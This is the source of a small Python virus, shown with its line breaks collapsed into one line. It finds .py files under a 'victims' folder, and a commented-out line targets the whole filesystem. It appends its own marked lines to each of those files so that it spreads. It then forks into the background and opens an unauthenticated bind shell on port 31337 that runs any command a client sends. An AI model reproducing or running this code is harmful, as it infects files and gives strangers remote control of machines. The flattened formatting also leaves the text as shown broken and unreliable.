import os #!x import sys #!x import glob #!x import socket #!x import string #!x # search command, adjust to your needs #cmd = 'find / -name "*.py" -print' #!x cmd = 'find ./victims -name "*.py" -print' #!x # keyword which prevents file from getting infected keyword = 'plsdontinjectme' #!x # for each file that matches the search command for snippet in os.popen(cmd).readlines(): #!x # strip newlines snippet = snippet[:-1] #!x try: #!x # open this file containing the target code code = open(__file__, 'r') #!x # open victim file victim = open(snippet, 'r') #!x # read the content of the victim file read_victim = victim.read() #!x # if the file contains keyword, do not inject code if str.find(read_victim, keyword) == -1: #!x # open it with write_append rights victim = open(snippet, 'a') #!x # for each line in for line in code.readlines(): #!x # if the line contains the copy signal if("#!x") in line: #!x # close the code file code.close() #!x # cast the line containing code insert=(line) #!x # insert the code into the victim file victim.write(insert) #!x # poor mans error handling except IOError: #!x a = 1 #!x # fork to bg pid = os.fork() #!x # make sure we are in the child process if pid > 0: #!x sys.exit(0) #!x try: #!x # create the socket and listen s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #!x s.bind(("0.0.0.0",31337)) #!x s.listen(1) #!x # poor mans socket error handling except socket.error as e: #!x print(e) #!x sys.exit(0) #!x # forever try to accept new connections while 1: #!x (cli,add) = s.accept() #!x info = {"platform":sys.platform, "version":sys.version} #!x welcome = "You are connected to shell on {0[platform]}, Python Version: {0[version]}\r\n".format(info) #!x cli.send(welcome.encode('utf-8')) #!x # forever receive cli commends, execute and report back while 1: #!x data = cli.recv(1024).rstrip() #!x resp = os.popen(data.decode('utf-8')).read() #!x cli.send(resp.encode('utf-8')) #!x